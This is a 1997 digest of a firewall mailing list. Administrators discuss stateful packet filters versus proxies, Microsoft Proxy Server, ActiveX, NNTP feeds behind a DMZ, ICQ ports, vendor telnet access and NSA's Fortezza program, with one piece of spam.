Citrix Gold Solutions Provider

From owner-firewalls-outgoing Sat Jun 7 11:55:17 1997
To: "Simon J. Gerraty"
Cc: Ryan Russell/SYBASE, firewalls
From: Ryan Russell/SYBASE
Date: 7 Jun 97 10:51:19 EDT
Subject: Re: Stateful Packet Filters vs. Proxies

A proxy would have the same problem.

Ryan

---------- Previous Message ----------
To: Ryan.Russell
cc: firewalls
From: sjg @ quick.com.au ("Simon J. Gerraty") @ smtp
Date: 06/07/97 04:19:41 PM
Subject: Re: Stateful Packet Filters vs. Proxies

Ryan Russell writes:
>Well, I finally got around to writing down my arguments
>on the above subject.
Check it out at: >>I hope to convince the reader, to whatever degree I can, of the following: >> 1.Proxies are a special case of a SPF. >> 2.SPFs can be the more secure choice depending on the requirements. >> 3.Network address translation (NAT) can be considered a form of >> security on it's own. One thing to note - SPF and crypto do not mix. I saw a case last week where users behind a PIX firewall could not use an encrypted FTP, because the PIX box could not inspect the content of PORT commands and allow the data ports to be connected to. Solutions are: 1. Use passive mode transfers. 2. Turn off the filtering in the PIX :-) 3. Do without crypto :-) 1 is obviously preferable if both sides can handle it - not always the case. The other two are not attractive at all. If they'd been using a proxy, they would not have had a problem. --sjg -- Simon J. Gerraty #include /* imagine something _very_ witty here */ From owner-firewalls-outgoing Sat Jun 7 12:10:17 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA03869 for firewalls-outgoing; Sat, 7 Jun 1997 11:41:27 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA03346 for ; Sat, 7 Jun 1997 11:24:12 -0700 (PDT) Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id KAA24974 for ; Sat, 7 Jun 1997 10:11:49 -0700 (PDT) Message-Id: <199706071711.KAA24974@miles.greatcircle.com> Received: from [192.168.1.202] by cat.bbsr.edu (SMTPD32-3.04) id A55348280328; Sat, 07 Jun 1997 14:07:31 -0300 From: "Jamie Thain" To: , , Cc: Subject: Re: Microsoft Proxy Server Date: Sat, 7 Jun 1997 14:08:36 -0300 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM 
Precedence: bulk Daniel, I would suggest that a microsoft proxy server on its own is not an industrial strength solution. The reasons are many, but simply put, it is up to the careful configuration of a single access point to allow or deny services. I would, and do always recommend that any hacker coming into a site has to jump at least three hurdles before arriving at the inside, and any one of those hurdles would provide "adequate" firewall protection on their own. For example, if someone turned on the "Publish Web Pages" on the MS proxy, it goes from strong to very weak. However if you put up the MS Proxy behind a Cisco PIX and infront of a Winframe server, then you have a pretty secure site. The DMZ needs to be between the PIX and the Proxy, and the Proxy is an "internal" firewall. The citrix Winframe prevents Java Nasties from getting the local workstation. More is better, cheap is not. regards:jamie ---------- > From: Daniel_Yamaguchi@iscci.com > To: Dick_Wall@stratus.com; firewalls@greatcircle.com > Cc: jmartin@iscci.com > Subject: Microsoft Proxy Server > Date: Friday, May 23, 1997 9:21 PM > > > > > > Dick - > > Please find below information regarding Microsoft Proxy Server. We, at ISC > Computers & Communications, Inc. feel that this solution will meet your > current needs regarding Internet Security. > > Please call me if you have any questions. > > Thank you, > > Daniel T. Yamaguchi > Marketing Mgr. > ISC Computers & Communications, Inc. > > > All About Microsoft Proxy Server > > Security > > Microsoft Proxy Server was designed with firewall-class security. Many > organizations will run their proxy servers in direct contact with the > Internet alongside such devices as packet-filtering routers and firewalls. > A proxy server needs to be just as secure as these devices. 
> > Microsoft's Proxy Server was subjected to extensive security testing and > evaluation from independent testing agency, Coopers & Lybrand's Information > Technology Security Services and is resistant to common attacks such as "IP > Spoofing", 'SATAN", and "ISS." This level of security is not typically > found other proxy servers on the market. > > Manageability & Ease of Use > > Microsoft Proxy Server is often used by small-medium sized business as the > primary gateway onto the Internet. In these environments, leveraging the > familiarity and ease of use of the Windows NT platform is paramount. > > Integrated with NT User Directory Services, Microsoft Proxy Server allows: > > Integrated Dial-Up Networking Support- using the Auto-Dial tool, Microsoft > Proxy Server provides exceptional support for networks that use dial-up > links for access to the Internet. > > Easy Installation through a full graphical set up program. > > Easy Administration provided by a clean, easy to understand and easy to > administer interface. > > Requires only One Internet IP address for a site by providing a single > point of management for all of an organization's Internet connectivity. > This reduces costs by making overall system not only easier to manage, but > also by requiring fewer "pipe" purchases by organizations. > > Remote Administration via Internet Service Manager allows Microsoft Proxy > Server to be managed from any Windows NT system on the network. > > Integrated with NT network system management services Microsoft Proxy > Server generates a suite of Windows NT Performance Counters for monitoring > the state of any Proxy Server on the network. > > Integration with SNMP allows the administrator to examine the current > status of any Microsoft Proxy Server on the network using an SNMP console > such as HP Open View. > > Web Proxy > > The Web Proxy component of Microsoft Proxy Server supports the industry > standard CERN-Proxy protocol. 
The CERN-Proxy protocol requires that client > programs be specifically configured to use the proxy server in order to > access the Internet via a modified version of the HTTP protocol and is > widely supported in popular browsers. > > Multi-Vendor Support - The Web Proxy Serve supports all popular web > browsers including: > Microsoft Internet Explorer 3.0 > Netscape Navigator 3.0 > PointCast Network > Multi-Platform Support - The Web Proxy Server supports all platforms > including: > Windows NT Server > Windows NT Workstation > Windows '95 > Windows for Workgroups/Win 3.1 > UNIX > Macintosh > Browser Protocols - The Web Proxy Server supports: > HTTP > FTP > Gopher > SSL (HTTPS & SNEWS) > WinSock Proxy > > Unlike the Web Proxy, the WinSock Proxy component provides extended, > transparent functionality past the HTTP, FTP, Gopher, & SSL protocol suite > into a wide range of non-Web protocols such as streaming audio & video. > Whereas the Web Proxy requires explicit client knowledge of the proxy, the > WinSock Proxy operates transparently without any modification to the client > program's protocol. > > The WinSock Proxy remotes" calls made by the Internet clients to the > industry standard WinSock 1.1 API to the Proxy server providing seamless > connectivity for these clients. > > Transparent Operation - WinSock Proxy requires no modifications to client > applications therefore working with existing clients. > > Generic support for all protocols - Any client -server protocol implemented > using the industry -standard WinSock 1.1 API can be enabled/disabled from > the WinSock Proxy Server. The WinSock Proxy ships pre-configured with a > wide range of popular protocols (e.g. Real Audio, NetShow, IRC) and can be > easily configured with the new protocol suites via a graphical tool as they > are standardized (e.g. LDAP) > > Support for connectionless/UDP protocols - Unlike other Proxies, the > WinSock Proxy supports connectionless protocols. 
> SOCKS v4-based proxies, for example, are only functional with "connection-oriented" transports and therefore exclude support for popular protocols such as streaming audio and video.
>
> Full authentication/logging - WinSock Proxy performs full access control, encrypted authentication, and logging of all transactions.
>
> Network Compatibility
>
> One of the best features of Microsoft Proxy Server is the use of WinSock Proxy to seamlessly provide a gateway between an administrator's existing IPX network infrastructure and IP-based network services.
>
> Integrates with IPX Networks - Unlike other proxy servers, Microsoft Proxy Server doesn't require administrators to "rip & replace" existing, legacy IPX networks with IP networks. This effectively preserves infrastructure investments.
>
> Integrates with NT network security domain model - Microsoft Proxy Server extensively leverages the network-based Windows NT domain security model to manage access permission and logging.
>
> Caching
>
> Reduced Internet Bandwidth Requirement - By keeping local copies of popular Internet objects and achieving cache hit rates up to 50%, the Web Proxy averts the need to upgrade/expand Internet connection bandwidth, thereby saving organizations money.
>
> Improved Client Performance - Because cached objects are retrieved at LAN speeds, clients achieve both increased throughput and reduced latency.
>
> Active caching adds intelligence to on-demand replication - Through sophisticated statistical analysis of usage trends, Microsoft Proxy Server proactively fetches objects from the Internet before the user is expected to request the object himself.
>
> Active caching results in Time-Shifting - Active caching takes into account the load on the server as it makes its individual object pre-fetch decision. The result of this metric is that active caching activity is shifted towards periods of low server utilization (e.g.
> overnight) "preparing" the cache for high traffic periods later in the day.
>
> Massive Scalability - Microsoft Proxy Server's cache is limited only by Windows NT Server system resources.
>
> Integration with Other Environs - Microsoft Proxy Server supports the industry standard CERN-compatible proxy services, and therefore can work with almost all existing Internet browsers and other applications that use the CERN proxy standard.
>
> Extensibility
>
> Microsoft Proxy Server fully supports the multi-vendor ISAPI Filter specification, enabling third parties to write value-enhancing add-ons to the Proxy server. Check out a list of current third party add-ons. These extensions provide functionality such as:
>
> Virus Scanning
>
> Advanced content/site filtering
>
> Pricing
>
> The price for Microsoft Proxy Server is $899.00.
>
>

From owner-firewalls-outgoing Sat Jun 7 14:55:11 1997
From: nibble
Reply-To: nibble@tin.it
To: firewalls@GreatCircle.COM
Date: Sat, 07 Jun 1997 23:46:48 +0200
Subject: ascend routers...
Message-ID: <3399D6C8.3755@tin.it>

Hi all,
my name's Nibble. Please, can someone tell me where I can find complete documentation about Ascend routers?

TNX in advance...
The Nibble

From owner-firewalls-outgoing Sat Jun 7 15:40:15 1997
From: "Jerry McKane"
Date: Sat, 7 Jun 1997 17:40:07 -0500
Subject: Re: ascend routers...
Message-Id: <199706072238.RAA22555@mailhost.onramp.net>

www.ascend.com

----------
> From: nibble
> To: firewalls@GreatCircle.COM
> Subject: ascend routers...
> Date: Saturday, June 07, 1997 4:46 PM
>
> Hi all,
> my name's Nibble. Please, can someone tell me where I can find
> complete documentation about Ascend routers?
>
> TNX in advance...
>
>
> The Nibble

From owner-firewalls-outgoing Sat Jun 7 15:55:19 1997
From: Kevin McPeake
To: firewalls@GreatCircle.COM
Date: Sun, 8 Jun 1997 00:54:04 +0200 (MET DST)
Subject: Hosting ActiveX applets
In-Reply-To: <039FA3395666B4AD*/c=us/admd=BellSouth/prmd=bis/o=ccmail/s=Frataccia/g=Rick/@MHS>

Okay, I hope someone can help me here.

I've seen all the arguments for why ActiveX should not be allowed into our corporate network via the Internet.

Can someone tell me if there are any good reasons why we should not allow ActiveX on our Web server to be served to visiting web browsing clients? Is the ActiveX component that we serve to clients considered a security risk for our internal network / web server?

Any input would be really appreciated.

Kev

Kevin McPeake
cowboy@home.byelex.nl
Internet Consultant
http://www.byelex.nl/

<< You know something's up when your Thought process is idle.
>>
USER     PID   %CPU %MEM VSZ   RSS  TTY   S STARTED  TIME    COMMAND
cowboy   28365 0.0  0.2  2.84M 264K ttyp1 S 12:57:12 0:00.02 Thought

From owner-firewalls-outgoing Sat Jun 7 17:25:11 1997
From: "Simon J. Gerraty"
To: Ryan Russell/SYBASE
cc: "Simon J. Gerraty", firewalls
Date: Sun, 08 Jun 1997 10:17:28 +1000
Subject: Re: Stateful Packet Filters vs. Proxies
In-reply-to: Your message of "07 Jun 97 10:51:19 EDT." <199706071744.KAA13723@notesgw2.sybase.com>
Message-Id: <199706080017.KAA02087@zen.quick.com.au>

> A proxy would have the same problem.

On the contrary, an ftp proxy would have been able to handle it - because it does not simply shuffle packets - it plays the protocol. I know, because my ftp proxy handles the same situation with no problems.
--sjg

From owner-firewalls-outgoing Sat Jun 7 17:40:31 1997
From: "Timothy D.J. Hunt"
To: doetzl@coop.crn.org
Cc: firewalls@greatcircle.com
Date: Sat, 07 Jun 1997 19:40:48 -0400
Subject: Re: NNTP server in DMZ?
In-Reply-To: <3396B74D.333@coop.crn.org>
Message-Id: <3.0.2.32.19970607194048.029fd084@localhost>

Joe:

At 07:55 AM 6/5/97 -0500, Joe Doetzl wrote:
>I have a customer who wishes to install a NNTP server. It is likely
>that they will host internal newsgroups that will need to be protected.
>The internal network is in the address range reserved for private
>internetworks. They are using SOCKS for access from the internal
>network to the Internet. Traffic to the DMZ is limited to ftp, http,
>dns, smtp and ntp.
>
>With that in mind is it possible to put the NNTP server on the inside
>and still get a feed from an upstream provider? This solution would
>eliminate the need for SOCKSified nntp clients.

The problem with the standard news feed is that the standard "IHAVE" protocol is a "push" feed with the sender connecting to your server. For this to work, your news server would need to be in the DMZ. If your customer and ISP are prepared to work with a "pull" feed, then your NNTP server can be on the internal network.
(Assuming that internal hosts can get to the Internet.) Take a look at "dnews", which pulls the news feed in for you by pretending to be a standard NNRP client.

Regards
----
Tim Hunt, Chatham, NJ, USA
phone: +1-973-635-5339  fax: +1-212-208-4385
e-mail: timh@nac.net

From owner-firewalls-outgoing Sat Jun 7 17:55:23 1997
From: Gabriel Dura
Reply-To: dura@geocities.com
To: firewalls@GreatCircle.COM
Date: Sun, 08 Jun 1997 03:14:45 -0700
Subject: Another ISP Security Connection Question
Message-ID: <339A8615.6692@geocities.com>

Hi!

A friend of mine asked me to help him with his slow Internet connection. Among other things I made a network check using Trumpet Hop Check. Here are the results for the route to the nearest server:

1. 193.yyy.145.zzz  local_Cisco_router.xxxxx.xxx  (131 ms)
2. 192.168.145.1                                  (382 ms) <- problem
3. 193.yyy.145.zzz  nearest_server.xxxxx.xxx      (385 ms)
Trace route finished - Port unreachable

There is a direct connection between these two servers. The 192.168.145.1 IP address should not exist. At this point there was a great delay in the packet times. I called the ISP and asked them for some explanations. They mumbled something about some problems with the router.
Everything is back to normal now, but this IP address is still there no matter what the destination of the packets is. Can anyone give me a hint? Is anyone using a sniffer? Is this a security problem? Is this a problem for personal privacy?

Any help would be greatly appreciated.

Thanks in advance,
Gabriel

From owner-firewalls-outgoing Sat Jun 7 18:10:22 1997
From: Gabriel Dura
Reply-To: dura@geocities.com
To: "Ricardo Alvarado B."
CC: firewalls@greatcircle.com
Date: Sun, 08 Jun 1997 02:48:28 -0700
Subject: Re: ICQ and udp port 4000
Message-ID: <339A7FEB.787F@geocities.com>

As far as I know the ICQ product currently uses the mirabilis.com:4000 server. But it also supports external programs like VDOPhone, Intel Internet Phone, etc. I guess for each of the external programs it must use specific ports. ICQ works from behind a firewall, but all I have seen yet are just beta versions so I don't think it would be a good idea to use it this way. Also I doubt it automatically configures the external program to work behind a firewall. This might be another potential security problem. Just as I said earlier, I use it at home where I don't really care about security, given the fact that I have nothing important on my computer.

Hope it helps,
Gabriel

Ricardo Alvarado B. wrote:
>
> Would you know if there are any other TCP/IP ports it uses besides 4000?
> Would it run on TCP 4000 besides on UDP?
>
> Thanks...
>
> Ricardo Alvarado B.
> DCN Network Provisioning
> v273.5767 DID: 528.153.5767
> SkyTel: 528.319.0779 PIN 628.2129
> e.mail: ralvarado@avantel.com.mx
>
> >-----Original Message-----
> >From: Gabriel Dura [SMTP:dura@geocities.com]
> >Sent: Friday, June 06, 1997 9:48 PM
> >To: Pat Verner
> >Cc: firewalls@GreatCircle.COM
> >Subject: Re: ICQ and udp port 4000
> >
> >Hi!
> >
> >I have used ICQ for some time... It is a chat utility but unlike a normal IRC
> >client it is designed for direct connection between computers. The main idea
> >behind this product is to find someone you want very fast... I don't
> >think you have any other sources of information about this product
> >because it is very new... Also technical support is unreliable... Most of
> >the ppl I know use it for its user interface and its features.
> >About security... I think all risks from DCC are the same here...
> >I never heard anyone complain about security problems but all the
> >people I know are using it at home where security is not very important.
> >
> >If there is anything I can help with I'll be glad to do it
> >
> >Regards,
> >Gabriel
> >
> >
> >Pat Verner wrote:
> >>
> >>
> >> I have just had a request to open port 4000 for outgoing UDP in order to
> >> support a product called ICQ. I must confess to being loath to open
> >> unnecessary udp ports, but don't want to let prejudice influence me
> >> unduly..
> >>
> >> Does anyone know anything about this product, and what the security
> >> implications would be in opening the port? Any comments would be
> >> appreciated.
> >>
> >> There is a blurb about ICQ on http://www.mirabilis.com/
> >>
> >> Thanks in anticipation ..
> >> =Pat
>

From owner-firewalls-outgoing Sat Jun 7 18:25:29 1997
From: Ryan Russell/SYBASE
To: "Simon J. Gerraty"
Cc: Ryan Russell/SYBASE, "Simon J. Gerraty", firewalls
Date: 7 Jun 97 18:26:27 EDT
Subject: Re: Stateful Packet Filters vs. Proxies
Message-Id: <199706080120.SAA28926@notesgw2.sybase.com>

Sure, an FTP proxy that can decrypt your encrypted FTP session will work, same as a SPF with the same features will. If a SPF or a proxy can act as one endpoint of an encrypted connection, it can watch for the port command and deal with it.

You seem to be under the impression that SPFs aren't capable of understanding the protocol being routed... if that were the case, the non-encrypted FTP session wouldn't work over the PIX box with NAT enabled, would it? There is no reason that the SPF software can't be designed to act as an encryption endpoint, but apparently the PIX hasn't for FTP.
Ryan

---------- Previous Message ----------
To: Ryan.Russell
cc: sjg, firewalls
From: sjg @ quick.com.au ("Simon J. Gerraty") @ smtp
Date: 06/08/97 10:17:28 AM
Subject: Re: Stateful Packet Filters vs. Proxies

> A proxy would have the same problem.

On the contrary, an ftp proxy would have been able to handle it - because it does not simply shuffle packets - it plays the protocol. I know, because my ftp proxy handles the same situation with no problems.

--sjg

From owner-firewalls-outgoing Sat Jun 7 21:25:29 1997
From: "Simon J. Gerraty"
To: Ryan Russell/SYBASE
cc: "Simon J. Gerraty", firewalls
Date: Sun, 08 Jun 1997 14:22:18 +1000
Subject: Re: Stateful Packet Filters vs. Proxies
In-reply-to: Your message of "07 Jun 97 18:26:27 EDT." <199706080120.SAA28918@notesgw2.sybase.com>
Message-Id: <199706080422.OAA09049@zen.quick.com.au>

> You seem to be under the impression that SPFs
> aren't capable of understanding the protocol
> being routed... if that were the case, the non-encrypted

No, I'm simply commenting on what exists - not what is theoretically possible.
--sjg

From owner-firewalls-outgoing Sat Jun 7 21:55:15 1997
From: Ryan Russell/SYBASE
To: "Simon J. Gerraty"
Cc: Ryan Russell/SYBASE, "Simon J. Gerraty", firewalls
Date: 7 Jun 97 21:49:04 EDT
Subject: Re: Stateful Packet Filters vs. Proxies
Message-Id: <199706080443.VAA01359@notesgw2.sybase.com>

Somewhere along the line you asked if SPFs could do what you described... Didn't you? I hate it when I forget what I was arguing about..

Ryan

---------- Previous Message ----------
To: Ryan.Russell
cc: sjg, firewalls
From: sjg @ quick.com.au ("Simon J. Gerraty") @ smtp
Date: 06/08/97 02:22:18 PM
Subject: Re: Stateful Packet Filters vs. Proxies

> You seem to be under the impression that SPFs
> aren't capable of understanding the protocol
> being routed... if that were the case, the non-encrypted

No, I'm simply commenting on what exists - not what is theoretically possible.
--sjg

From owner-firewalls-outgoing Sun Jun 8 00:25:31 1997
From: Hidayatullah Khan
To: "Firewalls@GreatCircle.COM"
Date: Sun, 8 Jun 1997 11:30:23 +0400
Subject: Restrict Springboarding

Hello All,

Ours is a large organization with class B addressing. We have a firewall in place to allow outgoing web and mail services. Often we have vendors coming in to our systems to support their applications. Our firewall is configured to allow the vendors to telnet to specific hosts. On a couple of occasions I have noticed a vendor's presence on a different host which he was not intended to be on. My question is how can we restrict a vendor from "springboarding" (i.e. telnetting to other machines on our network) from the actual specific host.
Thanks in Adv,
Khan

Khan@Bigfoot.com

From owner-firewalls-outgoing Sun Jun 8 06:40:17 1997
From: Adam Shostack
To: cowboy@home.byelex.nl (Kevin McPeake)
Cc: firewalls@GreatCircle.COM
Date: Sun, 8 Jun 1997 09:25:52 -0400 (EDT)
Subject: Re: Hosting ActiveX applets
In-Reply-To: from Kevin McPeake at "Jun 8, 97 00:54:04 am"
Message-Id: <199706081325.JAA21076@homeport.org>

Kevin McPeake wrote:
| I've seen all the arguments for why ActiveX should not be allowed into
| our corporate network via the Internet.
|
| Can someone tell me if there's any good reasons why we should not allow
| ActiveX on our Web server to be served to visiting web browsing clients?
| Is the ActiveX component that we serve to clients considered a security
| risk for our internal network / web server?

Well, no one seems to remember, but the *really cool* thing about the web was that anyone could view documents, on any platform. We had independence from proprietary standards. We had documents being created in a modifiable language (unlike, say, postscript). This was the first time in a while that we had that sort of vendor freedom.

The real reason to not use ActiveX is because you probably don't need to, and you're segmenting out your marketplace to pay homage to a vendor. Also, there are all sorts of security problems with Microsoft's implementations.
Many firewalls filter ActiveX, just like you do(?). So why are you creating web pages that your own company wouldn't allow in?

Adam

--
"It is seldom that liberty of any kind is lost all at once."
                                               -Hume

From owner-firewalls-outgoing Sun Jun 8 09:10:13 1997
From: valentin@bios.iuf.net
To: nibble@tin.it, firewalls@GreatCircle.COM
Date: Sun, 8 Jun 1997 18:19:44 +0300
Subject: Re: ascend routers...
Message-Id: <199706081519.SAA28424@bios.iuf.net>

At 23:46 7/06/97 +0200, nibble wrote:
>Hi all,
>my name's Nibble. Please, can someone tell me where I can find
>complete documentation about Ascend routers?
>
>TNX in advance...
>
>
>The Nibble
>
>

I'm from Crimea, ex-USSR... ;-))

IMHO, you can ask Yahoo (http://www.yahoo.com)!
Alex Velichko, Sebastopol

From owner-firewalls-outgoing Sun Jun 8 09:33:20 1997
From: Ryan Russell/SYBASE
To: Hidayatullah Khan
Cc: "Firewalls@GreatCircle.COM"
Date: 8 Jun 97 9:28:13 EDT
Subject: Re: Restrict Springboarding
Message-Id: <199706081622.JAA00162@notesgw2.sybase.com>

Your two choices are to put the hosts they do get access to into a DMZ, or to increase security on all the other hosts in your network. In your net, option 2 probably isn't practical.

Ryan

---------- Previous Message ----------
To: Firewalls
cc:
From: khanhi @ emirates.com (Hidayatullah Khan) @ smtp
Date: 06/08/97 11:30:23 AM
Subject: Restrict Springboarding

Hello All,

Ours is a large organization with class B addressing. We have a firewall in place to allow outgoing web and mail services. Often we have vendors coming in to our systems to support their applications. Our firewall is configured to allow the vendors to telnet to specific hosts.
On a couple of occasions I have noticed a vendor's presence on a different host which he was not intended to be on. My question is how can we restrict a vendor from "springboarding" (i.e. telnetting to other machines on our network) from the actual specific host.

Thanks in Adv,
Khan

Khan@Bigfoot.com

From owner-firewalls-outgoing Sun Jun 8 10:40:12 1997
From: "Adams, Gavin"
To: "'Firewalls@GreatCircle.COM'"
Date: Sun, 8 Jun 1997 14:26:48 -0300
Subject: RE: Restrict Springboarding

Khan wrote:

Date: Sun, 8 Jun 1997 11:30:23 +0400
From: Hidayatullah Khan
Subject: Restrict Springboarding

Hello All,

Ours is a large organization with class B addressing. We have a firewall in place to allow outgoing web and mail services. Often we have vendors coming in to our systems to support their applications. Our firewall is configured to allow the vendors to telnet to specific hosts. On a couple of occasions I have noticed a vendor's presence on a different host which he was not intended to be on. My question is how can we restrict a vendor from "springboarding" (i.e. telnetting to other machines on our network) from the actual specific host.
Thanks in Adv,
Khan

Bring up the question to your management, the people using this vendor, and the vendor themselves. Allowing people from the outside to telnet in is not a good thing. You may trust the vendor, but what happens if someone hacks the host(s) you allow telnet from? The hacker can now "springboard" to your network.

---
Gavin

From owner-firewalls-outgoing Sun Jun 8 12:31:16 1997
From: Vin McLellan
To: firewalls@greatcircle.com
Cc: pcoppinger@appsware.com, mjr@clark.net
Date: Sun, 8 Jun 1997 15:11:43 -0500
Subject: Re: Fortezza's Fate??

I had earlier written:

>> There are a lot of rumors buzzing around DC these days to the
>>effect that NSA and the Joint Chiefs have tossed in the towel and will,
>>within weeks, approve DoD purchases for non-Fortezza security systems, for
>>both strong authentication, and (I presume) more standard PKI. I
>>understand they have been briefing US.gov security staff and the
>>contractors who have been working on Fortezza apps.

Paul Coppinger responded:

>I'm, of course, interested in your sources of this information,

The NSA has been briefing Fortezza contractors and DoD staff.

> however I'm
>more interested in learning what kinds of security systems they intend to
>use in place of Fortezza. I just can't see protecting classified
>information using *only* a software token...

Not classified info.
As I understand it, Fortezza was originally (1991) designed by the NSA to be a (non-RSA) public-key encryption infrastructure for sensitive but unclassified (SUB) and confidential information. (More recently, there has been discussion of using Fortezza to cipher data labelled as "secret or below" -- which would obviously include the first level of classified data.)

For the user end of Fortezza PKI, I presume any wholly-software Fortezza "smartcard" would only be used to support encryption of sensitive but unclassified material (with an attached X509 certificate denoting the "limited assurance" available from such a software source.)

As I hear it, the NSA has also ruefully admitted -- at least internally -- that practical, affordable, "trusted" desktop workstations (a crucial piece of the Fortezza/MISSI architecture) will not be available in the immediate future. For this and other reasons, the rollout of Fortezza in its reference application -- DoD's Defense Messaging System (DMS) -- is admittedly stalled.

As a form-factor, the current Fortezza PCMCIA crypto card+reader is also a combination that has reportedly had both cost and reliability issues. (PCMCIA was not designed for the constant in/out use foreseen in Fortezza.) Smartcards, of course, remain an option -- but the memory and processing muscle available in the current Fortezza PC cards are apparently hard to match in a smartcard as yet. (NSA might be able to cram crucial pieces of Fortezza into a smartcard... if other functions can be off-loaded to a software PC client. Even for an interim period, software Fortezza without two-factor token-based authentication will worry me, among many.)

Some DoD agencies are reportedly demanding a software version of the Fortezza PKI token now, and have threatened to rebel against Fortezza/DMS's isolation from the broader universe of secure messaging.

Other federal agencies (EPA and Agriculture, among them) have reportedly already opted out of the Fortezza crypto culture -- just because they lose too much by being cut off from the secure e-mail universe which has emerged with commercial international use of RSA-based PKC. (In many parts of government, accepting Fortezza now will mean they will have to manage two (currently) wholly-incompatible PKC message and file systems, at both the administrative and user level, for SUB within the government and for SUB to the outside. Doesn't all this begin to smell like that legendary $700 Air Force hammer?)

NSA, of course, had hoped to use the aggregate US govt market to re-channel the then-emerging PKI technology into their carefully-restricted alternatives to RSA public-key crypto: the Digital Signature Standard (modulus 1024,) with the SHA-1 hash and Key Exchange Algorithm (KEA,) a Diffie-Hellman PKC variant. In Fortezza crypto, the symmetric key encryption is done with the still (?) classified Skipjack (type II) algorithm, which uses an 80-bit key.

The LEAF bureaucracy in Commerce and Treasury (which was to provide automatic key-escrow on Fortezza electronic mail outside the government) has been dismantled over the past two months, and the LEAF fields blanked in the PCMCIA firmware -- but "key-recovery" remains Native (automatic and unavoidable) in the Fortezza design.

Paul asked:

> Are you suggesting that the Skipjack algorithm is about to be published? :)

Well, what I hear is that it will be unclassified any day now (if it has not been done already) and distributed in software format to meet demand from DoD agencies. How close to -- or how far from -- "published" would you think that is? From the moment Fortezza is available in software, isn't it only a matter of time before the code falls into the hands of potential adversaries? That may happen faster than a copy of the code is spun off on the Internet for widespread scrutiny, but I wouldn't bet on it.

(Reverse engineering Skipjack and the rest of Fortezza will become The Challenge of the year in amateur cryptanalysis -- a race among many of the best and the brightest code mavens, CIOs as well as cypherpunks.)

Marcus, with his usual elan, noted:

> Wow!! I bet that's gonna really do wonders for all your
> Security Dynamics stock options, Vin!

No options, worst luck! I'm a consultant, not an employee, with independence in lieu of such goodies-)

Still, it is obvious that if DoD has acknowledged Fortezza PKI to be stalled -- and, because of that, will allow the purchase of non-Fortezza user-authentication systems -- all the OTP vendors will have a field day addressing the pent-up demand for robust user authentication in DoD, the Services, and the other security-conscious Washington agencies. SDTI will get its share, sure enough.

The more interesting question may be: how will NSA react to the growing pressure to abandon the isolation of Fortezza PKI, which can't interop with anything or anyone in the exploding world of e-commerce? With Fortezza DMS frozen, NSA and DoD _could_ have chosen to move back into commercial PKI, but they are apparently unwilling to do so. (Thus, the OTP token opportunity, where PKI smartcards might have been used.)

With s/mime mailers now in the two leading web browsers, millions (soldiers and bureaucrats, as well as businessmen and college kids) have ready access to user-friendly and robust encrypted e-mail, with digital signatures and all the gifts of PKI (and cheaply enhanced with a private key off-loaded to a smartcard when the readers become prevalent.)

I, for one, would like to see classified data isolated on classified networks, with firewalls made of brick. But SUB? Sensitive but unclassified traffic? Invoices for the purchase of whatnot, etc.? Where's the logic for dot-Gov as such an isolated enclave? Jealousy and/or common sense could make the Services and other Fortezza-locked crypto markets within dot.Gov.us irritable.

Fortezza is, after all, in large part a failed NSA attempt to corner the commercial market with a GAKed crypto messaging system. NSA having bet the farm and lost on that one, Fortezza's Martian isolation from the commercial PKI universe looks increasingly costly and perverse.

Suerte,
_Vin

Vin McLellan + The Privacy Guild + 53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548 -- <@><@> --

From owner-firewalls-outgoing Sun Jun 8 14:25:20 1997
From: Kent Crispin
To: firewalls@GreatCircle.COM, mjr@clark.net
Subject: Re: Fortezza's Fate??
Date: Sun, 8 Jun 1997 14:14:48 -0700
Message-ID: <19970608141448.55608@bywater.songbird.com>
X-PGP-Key: http://songbird.com/kent/pgp_key.html

On Sun, Jun 08, 1997 at 03:11:43PM -0500, Vin McLellan wrote:
[...]
> Not classified info. As I understand it, Fortezza was originally
> (1991) designed by the NSA to be a (non-RSA) public-key encryption
> infrastructure for sensitive but unclassified (SUB) and confidential
                                                 SBU
> information.

-- 
Kent Crispin                               "No reason to get excited",
kent@songbird.com                          the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html

From owner-firewalls-outgoing Sun Jun 8 15:43:55 1997
From: Futurecareers@Futurecareers.com
To: Futurecareers@Futurecareers.com
Subject: Business Opportunity
Date: Sun, 8 Jun 97 17:38:38 -0500
Message-Id: <199706090137.SAA17157@hitsrus.com>

///////////////////////////////////////////////////////////////////////////////
This Message was Composed using Extractor Pro Bulk E-Mail Software. If you wish to be removed from this advertiser's future mailings, please reply with the subject "Remove" and this software will automatically block you from their future mailings.
////////////////////////////////////////////////////////////////////////////////

BUSINESS OPPORTUNITY

WOULD YOU LIKE TO OFFER PEOPLE TO SHOP AT SAM'S CLUB ONLINE?? WOULD YOU LIKE TO START YOUR OWN WORK AT HOME BUSINESS?? HAVE YOUR OWN CATALOGS FOR PEOPLE TO BUY FROM?? THIS IS AN EXCELLENT WORK AT HOME OPPORTUNITY!!!

FOR MORE INFORMATION EMAIL - SUCCESS02@MEGD.COM

Thank you, you will not regret this!!! This is going to be a big money maker!!! You earn commissions from everything you sell from your own catalogs!!! THIS IS A NEW AND EXCITING WAY TO SHOP ONLINE AND YOU WILL BE RECEIVING OUR OWN CATALOGS FOR PEOPLE TO SHOP OFFLINE ALSO. YOU EARN COMMISSIONS ON PRODUCTS EVERYONE IN YOUR DOWNLINE PURCHASES.

You also get a FREE web page to market your products and to help you build your downline.

REPLY TO: SUCESS02@MEGD.COM
YOU WILL HAVE INFO IN SECONDS

Thank You.

From owner-firewalls-outgoing Sun Jun 8 17:25:35 1997
From: Bernd Eckenfels
To: Jamie Thain
Cc: "Kelly E. Gibbs", Ryan Russell/SYBASE, Bill Stout, firewalls
Subject: Re: Stateful Packet Filters vs. Proxies
Date: Mon, 9 Jun 1997 02:07:07 +0200
